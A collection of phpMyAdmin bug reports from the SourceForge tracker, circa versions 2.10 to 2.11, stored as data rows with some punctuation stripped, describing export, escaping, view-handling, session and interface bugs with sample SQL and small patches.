exporting a view produces a DROP TABLE `view name` Original URL https sourceforge.net p phpmyadmin bugs 2438 https sourceforge.net p phpmyadmin bugs 2438 Original author cybot tm Found in version Latest Git","bug"
"24444","8803","Table goes out of control symbols and ;).
I have PHP5 MySQL 4.1.21 UTF 8 PMA 2.10.1 RUS.
UTF 8 try this SQL CREATE TABLE `test` `tst1` text collate utf8 unicode ci NOT NULL, `tst2` text collate utf8 unicode ci NOT NULL, `tst3` text collate utf8 unicode ci NOT NULL ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8 unicode ci; INSERT INTO `test` `tst1`, `tst2`, `tst3`) VALUES dfgdfg ; , dfgdfg ; , ); then try to modify field test3 using Edit icon in browse section.
As for me, i can t edit any field after inserting and ; symbols in 2 or more fields.
It s strange that only two fields or more in one table whith this symbols crashes table.
Original URL https sourceforge.net p phpmyadmin bugs 2439 https sourceforge.net p phpmyadmin bugs 2439 Original author artfabrique Found in version 2.10.1","bug"
"24444","8804","No result when using cross join of tables.
phpMyAdmin displays no result when I use a cross join in the SQL statement.
I have the following table CREATE TABLE test table id INT); INSERT INTO test table values 1), 2), 3); If I start the query from the SQL input field SELECT FROM SELECT id FROM test table) a CROSS JOIN SELECT id FROM test table) b the statement gets displayed again, but no resultset.
The MySQL command line client prints | id | id | | 1 | 1 | | 2 | 1 | | 3 | 1 | | 1 | 2 | | 2 | 2 | | 3 | 2 | | 1 | 3 | | 2 | 3 | | 3 | 3 | 9 rows in set 0.00 sec) However, the correct result for the query SELECT FROM SELECT 1 AS a) a CROSS JOIN SELECT 2 AS b) b works.
The result set is printed correctly by phpMyAdmin.
I work with PHP 5.2.2 running as module in Apache 2.0.59, Windows XP Pro, MySQL client 5.0.37, MySQL Server 5.0.27, mysqli extension.
Original URL https sourceforge.net p phpmyadmin bugs 2440 https sourceforge.net p phpmyadmin bugs 2440 Original author mstach Found in version 2.10.1","bug"
"24444","8805","a\\b == a\\b but a\\b != \\ .
select abc\\def like c\\\\d , abc\\def like \\\\d , abc\\def like c\\\\ , abc\\def like \\\\ ; produces 1 0 1 0 but IMHO it should be 1 1 1 1 i didn t had the time to figure out if this is a phpMyAdmin, PHP, mysql library or MySQL server bug ...
Original URL https sourceforge.net p phpmyadmin bugs 2441 https sourceforge.net p phpmyadmin bugs 2441 Original author cybot tm Found in version Latest Git","bug"
"24444","8806","[Create PHP Code] doesn t include linebreaks.
[ Create PHP Code ] after editing a text field inserts superfluous spaces but no newlines, e.g., sql = UPDATE `airtom1`.`browsertest` SET `changed` = \ 2007 05 12 14 00 00\ , `browser` = \ ONLY after deleting old cookies .
now working with IE6 and Opera9 .
but only for one login attempt .
using pma211).\ WHERE `browsertest`.`id` = 4 LIMIT 1; ; should be something like sql = UPDATE `airtom1`.`browsertest` SET `changed` = \ 2007 05 12 14 00 00\ , `browser` = \ ONLY after deleting old cookies\n .
now working with IE6 and Opera9\n .
but only for one login attempt\n .
using pma211).\ WHERE `browsertest`.`id` = 4 LIMIT 1; ; table structure CREATE TABLE `browsertest` `changed` timestamp NOT NULL default CURRENT TIMESTAMP on update CURRENT TIMESTAMP, `id` mediumint 9) NOT NULL auto increment, `browser` mediumtext collate cp1250 czech cs NOT NULL, PRIMARY KEY `id`) ) ENGINE=MyISAM ....
Original URL https sourceforge.net p phpmyadmin bugs 2442 https sourceforge.net p phpmyadmin bugs 2442 Original author windkiel Found in version 2.10.1","bug"
"24444","8807","Column truncation in repair table output.
Hi, When I repair a table, the Msg text column gets truncated to Incorrect key file for table db ; try to repair i...
Original URL https sourceforge.net p phpmyadmin bugs 2443 https sourceforge.net p phpmyadmin bugs 2443 Original author olafvdspek Found in version 2.10.1","bug"
"24444","8808","html not encoded SQL query result.
Main Problem Create a field with more than 1000 characters with html tags in it, for example lt;b gt;), then try to change it with pencil icon) and add one more character.
You will see that in SQL query field at the top appears html not encoded symbols.
common.lib.php Line 1404 query base = htmlspecialchars sql query); htmlspecialchars added.
I m not sure we have to add this function here.
Think you see the problem and will solve it perfectly.
Second problem On the page there is another SQL query that shows data in the table, because of define mechanism used Line 1409 define PMA QUERY TOO BIG ,1); we have [...] ending in that query too.
I can t help you to solve problem with this ending, think we have to change define mechanism there or use it in another way.
Original URL https sourceforge.net p phpmyadmin bugs 2444 https sourceforge.net p phpmyadmin bugs 2444 Original author hanut Found in version 2.10.1","bug"
"24444","8809","detected failing session start warning fails.
If session.save path points to a bad folder on first visit no p cookies set) I get Notice Undefined index DefaultCharset in ....\libraries\select lang.lib.php on line 406 patch in libraries select lang.lib.php on line 406 convcharset = GLOBALS[ cfg ][ DefaultCharset ]; convcharset = isset GLOBALS[ cfg ][ DefaultCharset ]) ?
GLOBALS[ cfg ][ DefaultCharset ] en utf 8 ; same problem in trunk, line 415) Notice Undefined variable strSessionStartupErrorGeneral in D \HTdocs\07PMA\PmaStableSvn\libraries\session.inc.php on line 117 2nd fix add strSessionStartupErrorGeneral like in trunk to the lang files.
in trunk the whole Original URL https sourceforge.net p phpmyadmin bugs 2445 https sourceforge.net p phpmyadmin bugs 2445 Original author windkiel Found in version Latest Git","bug"
"24444","8810","No possibility of columns sorting in VIEW s. In case of some VIEW s there is no possibility of sorting data in results table by clicking on column title not links).
Example for test CREATE VIEW `test view` AS SELECT `id`,max `time`) FROM `test table` GROUP BY `id` Original URL https sourceforge.net p phpmyadmin bugs 2447 https sourceforge.net p phpmyadmin bugs 2447 Original author pga23 Found in version 2.10.1","bug"
"24444","8811","Login escape issues.
I have hosting on a Cpanel based website that when I change my password to have anything with a \ in it the login authentication fails.
I dont have access to the phpMyAdmin source on that but I think that this bug, while minor, should be fixed as there may be other people that may find one like it.
Suggested fix str replace \ , \\ , pmainput); Original URL https sourceforge.net p phpmyadmin bugs 2446 https sourceforge.net p phpmyadmin bugs 2446 Original author dragon legion Found in version 2.10.0.2","bug"
"24444","8812","multi edit broken if cfg[ InsertRows ]>2.
if cfg[ InsertRows ] gt;2 when inserting some rows the ignore checkboxes are not automatically unticked like in previous versions when entering the values.
When I hit Go without manually resetting the ignore checkboxes instead of adding the data at least of the first row) the main frame returns to tbl replace.php, now showing only one row to edit, but leading to a bad [sqlquery] = gt; INSERT INTO `134`.
`id`, `tmp`) VALUES NULL, 222 ); then.
Note table name is missing.
this was working very well in pma lt; 2.11 ) Original URL https sourceforge.net p phpmyadmin bugs 2448 https sourceforge.net p phpmyadmin bugs 2448 Original author windkiel Found in version Latest Git","bug"
"24444","8813","Calendar Go has no effect.
with js enabled if I just change the year or month and click Go the changes take no effekt in the form input.
Only if I click on any day it works like expected.
Original URL https sourceforge.net p phpmyadmin bugs 2449 https sourceforge.net p phpmyadmin bugs 2449 Original author windkiel Found in version 2.10.1","bug"
"24444","8814","unwanted table alias in delete button.
I was trying to find duplicate date entries this way CREATE TABLE `galerie` `ID` int 5) NOT NULL auto increment, `datum` date NOT NULL default 0000 00 00 , `path` varchar 50) collate utf8 czech ci NOT NULL, PRIMARY KEY `ID`) ) ENGINE=MyISAM AUTO INCREMENT=121 DEFAULT CHARSET=utf8 COLLATE=utf8 czech ci; select from galerie x WHERE select count ) from galerie y where y.datum=x.datum) gt;1 Query returned desired rows..
I clicked delete button on unwanted row.
Error was shown SQL DELETE FROM galerie WHERE x.ID =27 LIMIT 1 MySQL error 1054 Unknown column x.ID in where clause Original URL https sourceforge.net p phpmyadmin bugs 2450 https sourceforge.net p phpmyadmin bugs 2450 Original author marekmalysz Found in version 2.10.1","bug"
"24444","8815","Copy Database View Problem.
Hi, We have databases in which we have tables and views...
When we go into operation copy database to make a backup, tables get copied, but the new database is missing all the views... An error page is generated with an error I will paste below The error seems to be very easy to fix... Just change CREATE ALGORITHM = UNDEFINED DEFINER = `mysqladmin` `64.18.66.
` SQL SECURITY INVOKER VIEW for CREATE ALGORITHM = UNDEFINED DEFINER = mysqladmin 64.18.66.
SQL SECURITY INVOKER VIEW I Just replaced the backquote by quote around the definer username and ip) SQL query DocumentationEdit CREATE ALGORITHM = UNDEFINED DEFINER = `mysqladmin` `64.18.66.
` SQL SECURITY INVOKER VIEW `dicair backup 2007 06 10`.`vActivesessionlist` AS SELECT `dicair backup 2007 06 10`.`tActivesession`.`pkiActivesessionID` AS `pkiActivesessionID` , `dicair backup 2007 06 10`.`tActivesession`.`fkiUserID` AS `fkiUserID` , `dicair backup 2007 06 10`.`tActivesession`.`fkiComputerID` AS `fkiComputerID` , `dicair backup 2007 06 10`.`tActivesession`.`dtActivesessionFirsthit` AS `dtActivesessionFirsthit` , `dicair backup 2007 06 10`.`tActivesession`.`dtActivesessionLasthit` AS `dtActivesessionLasthit` , `dicair backup 2007 06 10`.`tActivesession`.`sActivesessionIP` AS `sActivesessionIP` , `dicair backup 2007 06 10`.`tActivesession`.`bActivesessionIssuperadmin` AS `bActivesessionIssuperadmin` , `dicair backup 2007 06 10`.`tUser`.`sUserLoginname` AS `sUserLoginname` , `dicair backup 2007 06 10`.`tComputer`.`sComputerDescription` AS `sComputerDescription` , concat `dicair backup 2007 06 10`.`tCompany`.`sCompanyName` , utf8 , `dicair backup 2007 06 10`.`tDepartment`.`sDepartmentName` ) AS `CompanyDepartment` , `dicair backup 2007 06 10`.`tCompany`.`fkiLanguageID` AS `fkiLanguageIDCompany` , `dicair backup 2007 06 10`.`tDepartment`.`fkiLanguageID` AS `fkiLanguageIDDepartment` , `dicair backup 2007 06 10`.`tComputer`.`pkiComputerID` AS `pkiComputerID` FROM `dicair backup 2007 06 10`.`tActivesession` JOIN `dicair backup 2007 06 10`.`tUser` ) JOIN `dicair backup 2007 06 10`.`tComputer` ) JOIN `dicair backup 2007 06 10`.`tCompany` ) JOIN `dicair backup 2007 06 10`.`tDepartment` ) WHERE `dicair backup 2007 06 10`.`tUser`.`pkiUserID` = `dicair backup 2007 06 10`.`tActivesession`.`fkiUserID` ) AND `dicair backup 2007 06 10`.`tComputer`.`pkiComputerID` = `dicair backup 2007 06 10`.`tActivesession`.`fkiComputerID` ) AND `dicair backup 2007 06 10`.`tCompany`.`pkiCompanyID` = `dicair backup 2007 06 10`.`tActivesession`.`fkiCompanyID` ) AND `dicair backup 2007 06 10`.`tDepartment`.`pkiDepartmentID` = `dicair backup 2007 06 10`.`tActivesession`.`fkiDepartmentID` ) ) MySQL said Documentation 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 64.18.66.
` SQL SECURITY INVOKER VIEW `dicair backup 2007 06 10`.`vActivesessio at line 1 Original URL https sourceforge.net p phpmyadmin bugs 2451 https sourceforge.net p phpmyadmin bugs 2451 Original author herrick Found in version 2.10.1","bug"
"24444","8816","Query pretty printer forgets HTML line break tags.
Hi, The query pretty printer sometimes does insert \n, but it doesn t insert [br].
See attached screenshot.
Original URL https sourceforge.net p phpmyadmin bugs 2452 https sourceforge.net p phpmyadmin bugs 2452 Original author olafvdspek Found in version 2.10.2 rc1","bug"
"24444","8817","Bug import from web server.
if i import the file in pc work good with import in many time but the same file import from webserver upload dir show this error Fatal error Maximum execution time of 30 seconds exceeded in var www vhosts ... httpdocs phpmyadmin libraries string.lib.php on line 91 Original URL https sourceforge.net p phpmyadmin bugs 2453 https sourceforge.net p phpmyadmin bugs 2453 Original author fantu","bug"
"24444","8818","select width broken if cfg[ LeftDisplayServers ] ==1.
work in progress with cfg[ LeftDisplayServers ] = true; the new original css theme left.css.php select lightm db\{ width 100 \} breaks the server select width now wider than the framewidth).
btw since the navi frame is relatively narrow instead of lt; lt; lt; Page number [2] gt; gt; gt; i d suggest Page number lt; lt; lt; [2] gt; gt; gt; Original URL https sourceforge.net p phpmyadmin bugs 2454 https sourceforge.net p phpmyadmin bugs 2454 Original author windkiel Found in version Latest Git","bug"
"24444","8819","with mod security Cannot edit delete records.
In fedora 7.
If mod security is installed then phpMyAdmin cannot edit or delete records.
If rpm package mod security is removed, then it will work.
Original URL https sourceforge.net p phpmyadmin bugs 2455 https sourceforge.net p phpmyadmin bugs 2455 Original author sgodsell Found in version 2.10.0","bug"
"24444","8820","sessions table causes relogin.
I get an error everytime I click on Browse twice in my sessions table.
one I created in an own db) Every other table works perfectly fine.
Somehow the errormessage kicks me back to a loginscreen on german.
I once had German as the phpMyAdmin language, but changed it.
Errormessage Fehler Da Sie seit mindestens 1800 Sekunden inaktiv waren, wurden Sie automatisch abgemeldet.
Bitte melden Sie sich erneut an.
means, I got automatically logged out because I was inactive for over 1800 secons.
it is correct, that I was inactive, but when I relog I get the same thing again after 10 seconds.
If I push the backbutton of my browser twice once only gets me back the left frame) I get back to the table.
When I then click on any other table, it works perfectly fine.
But still I can t click twice on the Browse link in the sessions table.
I use this as a refresh, to see what changed ) I use MySQL 5.0.37, PHP 5.2.1 installed via XAMPP) and Opera 9.20.
The table is attached in the zip file.
Original URL https sourceforge.net p phpmyadmin bugs 2456 https sourceforge.net p phpmyadmin bugs 2456 Original author maritz Found in version 2.10.0.2","bug"
"24444","8821","Signon login method doesn t logoff.
Hi, I ve found a problem....I m using phpMyAdmin 2.10.2, and i ve tried the signon method for login.
I ve copied the sample script and changed apperance code at beginning is the same).
When I login, everything goes normal, I can work normal, everything is fine...Then I ve clicked logout.
Page is redirected to login screen http phpmyadmin.t3hn0.com login.php?phpMyAdmin=...) and if I re enter url http phpmyadmin.t3hn0.com) I m suddenly logged in.
I ve even tried to destroy session in my login.php with if isset GET[ phpMyAdmin ])) \{ session destroy ); \} But no go.
Besides...It would be nice if GET atributes would stay like old usr ).
using MySQL 5.0.37, tested with IE 6, Opera 9.21 and FF 2.0.0.3.
Original URL https sourceforge.net p phpmyadmin bugs 2457 https sourceforge.net p phpmyadmin bugs 2457 Original author t3hn0 Found in version Latest Git","bug"
"24444","8822","Invalid DB name is still displayed.
1 Try to insert a invalid database name ex.invalid.db.name) 2 PHPMyAdmin works fine and return the ERROR Invalid database name 3 in the left frame you see the database name but it do not exists Original URL https sourceforge.net p phpmyadmin bugs 2458 https sourceforge.net p phpmyadmin bugs 2458 Original author lotabi Found in version 2.10.2","bug"
"24444","8823","LeftLogoLink fails if set to some external sites.
I have this in my config cfg[ LeftLogoLink ] = http www.phpmyadmin.net ; When I pass the mouse over the link in the left navigation bar... it says http www.phpmyadmin.net home page index.php?token=c91a6dacbb780a4efb0ae7adda0942c5 When I click on it... phpmyadmin.net and some other external sites) does not like the ?token=c91a6dacbb780a4efb0ae7adda0942c5 bit...
This means that http www.phpmyadmin.net re writes the address to http www.phpmyadmin.netindex.php Which fails!
Should external LeftLogoLink addresses have the ?token bit dropped?
Original URL https sourceforge.net p phpmyadmin bugs 2459 https sourceforge.net p phpmyadmin bugs 2459 Original author ajos1 Found in version 2.10.0.2","bug"
"24444","8824","getCookiePath should use cfg[ PmaAbsoluteUri ].
In some cases with Apache reverse proxies phpMyAdmin adds the wrong path to cookies.
libraries Config.class.php gt; getCookiePath ) says .
Ok, its clear SERVER[ REQUEST URI ] = phpinfo.php SERVER[ SCRIPT NAME ] = phpinfo.php SERVER[ PHP SELF ] = phpinfo.php But I call phpMyAdmin via a reverse proxy http www.mydomain.com phpmyadmin phpinfo.php So What about a new config variable to set an inititial value for static cookie path = null; in line 836 of libraries Config.class.php In my case I set this variable to static cookie path = phpmyadmin ; Reason I dont want that my browser sends the phpmyadmin cookies to any other url in http www.mydomain.com ...
Original URL https sourceforge.net p phpmyadmin bugs 2460 https sourceforge.net p phpmyadmin bugs 2460 Original author pzystorm","bug"
"24444","8825","Left frame shrinks on database change.
If i change the database via drop down menu, the left frame gets smaller and smaller.
I found a solution in js navigation.js.
Here s my patch for v2.10.2 4a5 gt; var pma navi width cookie; 52a54 gt; if pma navi width lt; pma navi width cookie) pma navi width = pma navi width cookie; 80c82 lt; pma navi width = PMA getCookie pma navi width ); gt; pma navi width = pma navi width cookie = PMA getCookie pma navi width ); Original URL https sourceforge.net p phpmyadmin bugs 2461 https sourceforge.net p phpmyadmin bugs 2461 Original author em gotcha Found in version 2.10.2","bug"
"24444","8826","Export emits blanks at line ends.
I got the problem that with SQL export, empty comment lines would have a trailing blank because the comment prefix is ).
That s all fine, except that if peoples editors are configured to swallow trailing blanks on file save, you get tons of irrelevant changes in version management systems.
Proposed correction In phpMyAdmin export.php, insert this code near the beginning of PMA exportOutputHandler Strip blanks at line ends line = preg replace m , , line); This assumes that phpMyAdmin does not export significant blanks at end of line anywhere.
I can t verify whether that assumption holds in all cases, but it sounds reasonable enough to me.
The only exception that I can imagine would be a format that emits each field on a separate line and does not use any escape or quote characters.
I m not sure that such a format would make much sense for other reasons though.)
HTH Jo Original URL https sourceforge.net p phpmyadmin bugs 2463 https sourceforge.net p phpmyadmin bugs 2463 Original author inwood Found in version 2.10.1","bug"
"24444","8827","support column name having square brackets.
When I try and insert some string into a field which ends with ] SQL query INSERT INTO `db[test]`.`table[test]` `f[test` lt; NOTE ] missing ) VALUES rfv ) MySQL said 1054 Unknown column f[test in field list but using the sql window works INSERT INTO `db[test]`.`table[test]` `f[test]` manually corrected ) VALUES rfv ) Inserted rows 1 Query took 0.0003 sec) Original URL https sourceforge.net p phpmyadmin bugs 2462 https sourceforge.net p phpmyadmin bugs 2462 Original author windkiel Found in version 2.10.2","bug"
"24444","8828","Unable to update records with newlines in TEXT.
There seems to be a bug in phpmyadmin that stops you from updating a record if it conatins a text field with a newline in it.
eg phpmyadmin won t seem to update the textfield field in this simple table...
CREATE TABLE `test` `id` int, `textfield` text ); INSERT INTO `test` VALUES 1, Line1\r\nLine2 ); Doing a browse and then an edit, and trying to change the textfield field to something else eg simply x ) has no effect.
I guess that phpmyadmin tries to update the record for which every field matches that being edited, but that having the \r\n characters in a text field causes the match to fail for this field?
Original URL https sourceforge.net p phpmyadmin bugs 2464 https sourceforge.net p phpmyadmin bugs 2464 Original author simon1999 Found in version 2.10.2","bug"
"24444","8829","Incorrect handling of > and < in database table names.
If you try to create a database with gt; in the name, then it creates the database correctly, but when displayed on the PHPMyAdmin interface, the name of the database is written such that the gt; is converted to amp;gt; .
It is correctly handled in the list of databases in the drop down menu shown on the left hand side of the phpMyAdmin interface, but when the database itself is selected, the database name which appears under this list) has the gt; converted to the HTML special character.)
The same is true for lt; also I ve not checked other HTML special characters.
When trying to create a table with a name that includes the character gt; or lt; in it, the conversion to the HTML character is made before the CREATE TABLE command is executed, thus creating a table with amp;gt; in it.
e.g.
CREATE TABLE upper amp;gt;lower ...
The table names are displayed as they are stored in the database, so if a table is created outside of phpMyAdmin) with a name including a gt; or lt; , they are correctly displayed.
However, if the table name itself includes amp;gt; as currently happens when using phpMyAdmin), this is shown in the phpMyAdmin interface.
Original URL https sourceforge.net p phpmyadmin bugs 2465 https sourceforge.net p phpmyadmin bugs 2465 Original author maccaday Found in version 2.10.2","bug"
"24444","8830","The downloads page is not Valid XHTML 1.0 Transitional.
http validator.w3.org check?uri=http www.phpmyadmin.net downloads.php Below are the results of checking this document for XML well formedness and validity.
Error Line 391 column 28 there is no attribute height .
lt;div class= footer height= 18 style= text align center gt; Original URL https sourceforge.net p phpmyadmin bugs 2466 https sourceforge.net p phpmyadmin bugs 2466 Original author lonefeel","bug"
"24444","8831","Incorrect parameter validation for VIEWs.
When browsing a view, the default number of rows to display is 30.
When trying to change the value in the Show [30] rows starting from record [x] , an error is returned saying x is not a valid row number where x is any integer.
Version info MySQL 5.0.41 linux x86 64) PHP 5.2.0 phpMyAdmin 2.10.2 Original URL https sourceforge.net p phpmyadmin bugs 2467 https sourceforge.net p phpmyadmin bugs 2467 Original author j post","bug"
"24444","8832","htaccess problems under libraries.
A .htaccess file has cropped up in the libraries folder.
An odd choice.
Many servers dont support files starting with dot as I am experiencing here, and also have these restricted.
Secondly, its not always going to be apache based.
Thirdly, often the htaccess file name is different from .htaccess.
Couldnt you just put a blank index.html file in here if its to stop file listings, presumably all being PHP passed files nothing should show or happen otherwise?
If possible, could you consider removing as I can no longer use SVN on to the stable releases, or even export, I now have to go to alternative machines remove that file and transfer.
Cheers, Nick Original URL https sourceforge.net p phpmyadmin bugs 2468 https sourceforge.net p phpmyadmin bugs 2468 Original author terado Found in version 2.10.2","bug"
"24444","8833","view contents is exported as table data.
View contents is exported as table data with insert into sql command).
When importing, it of course fails with an error, because the view is of course not updatable.
View contents should not be exported at all.
Original URL https sourceforge.net p phpmyadmin bugs 2469 https sourceforge.net p phpmyadmin bugs 2469 Original author telensky Found in version 2.10.2","bug"
"24444","8834","truncated table list in navi frame.
with cfg[ MaxTableList ] = 10; and cfg[ LeftFrameLight ] = true;) in config.inc.php I think we need a table pager here as well.
Original URL https sourceforge.net p phpmyadmin bugs 2470 https sourceforge.net p phpmyadmin bugs 2470 Original author windkiel Found in version Latest Git","bug"
"24444","8835","dropdown instead of input when editing.
It is not possible to input or edit anything CREATE TABLE IF NOT EXISTS `form bug` `abc` varchar 16) NOT NULL, `ts` timestamp NOT NULL default CURRENT TIMESTAMP on update CURRENT TIMESTAMP ) ENGINE=MyISAM DEFAULT CHARSET=latin1; atm you can see some weird input form on the demo server http pma.cihar.com trunk config tbl change.php?db=test table=form bug and on STABLE as well) I noticed this issue several times before but don t know how to reproduce it.
Original URL https sourceforge.net p phpmyadmin bugs 2471 https sourceforge.net p phpmyadmin bugs 2471 Original author windkiel Found in version Latest Git","bug"
"24444","8836","Database names containing underscores improperly handled.
I have been wanting to manage my MySQL databases using phpMyAdmin so I finally took the time to connect it up to my db but there is a problem using displaying updating etc.
all my databases.
My database has hundreds of databases that have underscores in the names.
I ve never had any problem using these with MySQL so I wasn t expecting any issue with them with phpMyAdmin.
But after doing some searching this seems to be some type of pervasive problem with phpMyAdmin.
Is there some reason why phpMyAdmin cannot properly support database names with underscores?
I see complaints about this going back at least four years!
I am using phpMyAdmin 2.10.0.2 and both MySQL 5.0.37 and 5.1.20 beta.
For example, I have databases like abc newyork ny.
And phpMyAdmin does wierd things where it ends up like abc\ newyork\ ny and then other operations fail.
I just checked the allowable identifiers for MySQL and it appears phpMyAdmin is actually creating illegal database names when it puts out names like abc\ newyork\ ny.
ref http dev.mysql.com doc refman 5.0 en identifiers.html Database names cannot contain xe2x80x98 xe2x80x99, xe2x80x98\xe2x80x99, xe2x80x98.xe2x80x99, or characters that are not allowed in a directory name.
and further on it actually talks about the allowable characters for names An identifier may be ... Special characters are those outside the set of alphanumeric characters from the current character set, xe2x80x98 xe2x80x99, and xe2x80x98 xe2x80x99.
So is an allowable character for names.
Original URL https sourceforge.net p phpmyadmin bugs 2472 https sourceforge.net p phpmyadmin bugs 2472 Original author grenoml Found in version 2.10.0.2","bug"
"24444","8837","undefined function get magic quotes gpc ).
Fatal error Call to undefined function get magic quotes gpc ) in \htdocs\phpmyadmin\libraries\common.lib.php on line 2606 Original URL https sourceforge.net p phpmyadmin bugs 2473 https sourceforge.net p phpmyadmin bugs 2473 Original author master bx Found in version 2.10.2","bug"
"24444","8838","Warn about rename database being copy delete.
Hi, Rename database appears to be implemented as copy delete, which is very time consuming.
I think a warning in the interface about this would be appropriate.
Original URL https sourceforge.net p phpmyadmin bugs 2474 https sourceforge.net p phpmyadmin bugs 2474 Original author olafvdspek","bug"
"24444","8839","Browser freezes, javascript errors.
When I execute update queries, sometimes it takes minutes until the response page appears.
Other times firefox.exe takes 100 processor time, and has to be killed in Task Manager.
Issues are not related to specific tables, it happens randomly.
Also there are a lot of javascript errors, like window.parent.updateTableTitle is not a function .
Original URL https sourceforge.net p phpmyadmin bugs 2475 https sourceforge.net p phpmyadmin bugs 2475 Original author jbtibor Found in version 2.10.0.2","bug"
"24444","8840","Browse View PHP Error.
Create a view on a table.
The view restricts the columns that are displayed, and renames some of the columns .
The view statement selects a subset of fields from single table and renames the fields.
Browse the contents of the view.
The following php errors are reported Notice Undefined variable total in home www phpmyadmin libraries display tbl.lib.php on line 1749 Notice Undefined variable total in home www phpmyadmin libraries display tbl.lib.php on line 1754 Notice Undefined variable total in home www phpmyadmin libraries display tbl.lib.php on line 1756 Notice Undefined variable total in home www phpmyadmin libraries display tbl.lib.php on line 1757 As a result the browse functions that allow page selection do not work.
Original URL https sourceforge.net p phpmyadmin bugs 2476 https sourceforge.net p phpmyadmin bugs 2476 Original author estow Found in version 2.10.0.2","bug"
"24444","8841","Renaming a database containing a VIEW.
In 2.10.2, syntax error.
In 2.10.3 rc1, the rename works, the new VIEW points correctly to the new table, but there is an extra DROP TABLE generated for this view.
This produces an error and the left panel is not updated correctly.
Original URL https sourceforge.net p phpmyadmin bugs 2477 https sourceforge.net p phpmyadmin bugs 2477 Original author lem9 Found in version 2.10.2","bug"
"24444","8842","Empty fields in query export to ODSpreadsheet.
When exporting the results of a query to an Open Document Spreadsheet, the content of some fields does not make it to the document.
Steps to reproduce 1) create a test table CREATE TABLE test id tinyint 2) unsigned NOT NULL auto increment, a tinyint 2) unsigned NOT NULL, b tinyint 2) unsigned NOT NULL, PRIMARY KEY id)) ENGINE=MyISAM DEFAULT CHARSET=latin1; 2) enter a couple of records with values for a and b, e.g.
INSERT INTO test a,b) VALUES 1,1), 2,3); 3) go to the table in phpmyadmin and hit the sql tab and enter the query select ,a b as sum from test; 4) in the query results operations box click on export 5) choose open document spreadsheet as the export format and check the option to have the field names at the first row 6) start the export and open the document you will see that for the sum field no values are included Original URL https sourceforge.net p phpmyadmin bugs 2478 https sourceforge.net p phpmyadmin bugs 2478 Original author jknockaert Found in version 2.10.3","bug"
"24444","8843","wrong place for styling.
phpmyadmin.css.php, revision 10514, line 795 .navi dbName \{ font weight bold; color 0000FF; \} this belong into css theme name theme left.css.php furthermore 00f is almost not visible in theme Dark... should be color lt;?php echo GLOBALS[ cfg ][ NaviColor ]; ?
gt;; to make use of the values from layout.inc.php another quirk but not due to the last modifikations) if cfg[ LeftDisplayServers ] = 1; and cfg[ DisplayServersList ] = 1; the select a server links are not clearly visible in theme Dark... as well.
Original URL https sourceforge.net p phpmyadmin bugs 2479 https sourceforge.net p phpmyadmin bugs 2479 Original author windkiel Found in version Latest Git","bug"
"24444","8844","open basedir warning on import.
There is a open basedir warning on the import page.
Warning is file ) [function.is file] open basedir restriction in effect.
File tmp ..) is not within the allowed path s) [...]) in [...]pma libraries file listing.php on line 21 Import works as expected.
Security advisor ================= DO NOT add tmp .. to you open basedir, otherwise your system is open for every one.
tmp .. means Original URL https sourceforge.net p phpmyadmin bugs 2480 https sourceforge.net p phpmyadmin bugs 2480 Original author romansoldier Found in version 2.10.3","bug"
"24444","8845","Export Fails with RAND ).
phpMyAdmin 2.10.0.2 fails on export while using RAND ).
I also tried this on the test server located at http pma.cihar.com trunk running phpMyAdmin 3.0.0 dev with the same results.
Here is a sample query.
select from artisti order by rand ) limit 2 Also in this instance select from artisti order by rand ) also breaks on export.
The type of exports I used were CSV.
It does not seem the LIMIT is always needed to cause this break.
Original URL https sourceforge.net p phpmyadmin bugs 2481 https sourceforge.net p phpmyadmin bugs 2481 Original author blobaugh","bug"
"24444","8846","browse foreigners fails due to newlines.
browse foreigners fails at least in some browsers), because the url has newlines.
Patch attached.
Original URL https sourceforge.net p phpmyadmin bugs 2482 https sourceforge.net p phpmyadmin bugs 2482 Original author ctulhu","bug"
"24444","8847","Displayed query time not taking COUNT ) into account.
phpMyAdmin 2.10.3 and below I guess) It looks like when you execute an SQL query, using the SQL tab located on each table s page, the Query took time is incorrect.
not really, but still) This is not noticeable if the query is fast, but can be misleading if the query is complex and or may take a long time to execute.
The reason is phpMyAdmin s result pagination thanks to LIMIT 0, 30).
phpMyAdmin first runs a COUNT ) of the actual query, and then appends the LIMIT 30 to paginate, and shows the Query time of the LIMIT ed query.
So, in reality, the query took time is correctly indicative of the query in question, but it s possible like in my case), where the COUNT )ing can take take long enough to throw off the displayed time.
Solutions Explanation on the page, or adding the COUNT ) time, or best, show both times ) Original URL https sourceforge.net p phpmyadmin bugs 2483 https sourceforge.net p phpmyadmin bugs 2483 Original author mukul","bug"
"24444","8848","goto last page on navi db structure) faulty.
If I click on the gt; gt; double right arrow) in the navi frame no database is shown.
Ok if I use the page selector or multiple gt; single right arrow) If I click on the gt; gt; on the db structure page all tables are shown.
Original URL https sourceforge.net p phpmyadmin bugs 2484 https sourceforge.net p phpmyadmin bugs 2484 Original author windkiel Found in version Latest Git","bug"
"24444","8849","Cannot upload BLOB into existing row.
I get several of these Notice Undefined index `bintest`.`id` = 137 in phpMyAdmin libraries File.class.php on line 353 Original URL https sourceforge.net p phpmyadmin bugs 2485 https sourceforge.net p phpmyadmin bugs 2485 Original author lem9 Found in version 2.11.6","bug"
"24444","8850","Copy database with view of a view.
Hi, We tested the copy database feature in phpmyadmin 2.10.3 which now supports copying views without errors.
The fix works fine, but we found a new problem.
This one is probably really hard to fix.
The problem happens when you copy a database in the operation tab and you have a view that does a select in another view which has not been copied yet.
Here is a sql example CREATE DATABASE `test` ; CREATE TABLE `table1` `field` TINYINT NOT NULL ) ENGINE = MYISAM ; CREATE SQL SECURITY INVOKER VIEW view2 AS SELECT FROM table1; CREATE SQL SECURITY INVOKER VIEW view1 AS SELECT FROM view2; Since view1 comes before view2 in alphabetical order, when you copy view1 to the new database, a sql error is generated saying view2 doesnt exist.
The problem doesnt happen with tables since you create the tables before creating the views.
Beside parsing the view creation syntax to find out if the there is uncreated views which the view depends on, I don t see how you could fix that problem.
On my side, an easy workaround is to make sure the name of the views are ordered in a way that a view doesnt include another view unless it s name is coming first in the alphabet... ;) Thanks Original URL https sourceforge.net p phpmyadmin bugs 2486 https sourceforge.net p phpmyadmin bugs 2486 Original author herrick Found in version 2.11.0","bug"
"24444","8851","edit records go link.
When editing multiple records at the same time a row with a Go link is inserted every 17 rows.
i presume this is a bug and it should be appearing at the end of each record.
Original URL https sourceforge.net p phpmyadmin bugs 2487 https sourceforge.net p phpmyadmin bugs 2487 Original author theblazingangel Found in version 2.10.3","bug"
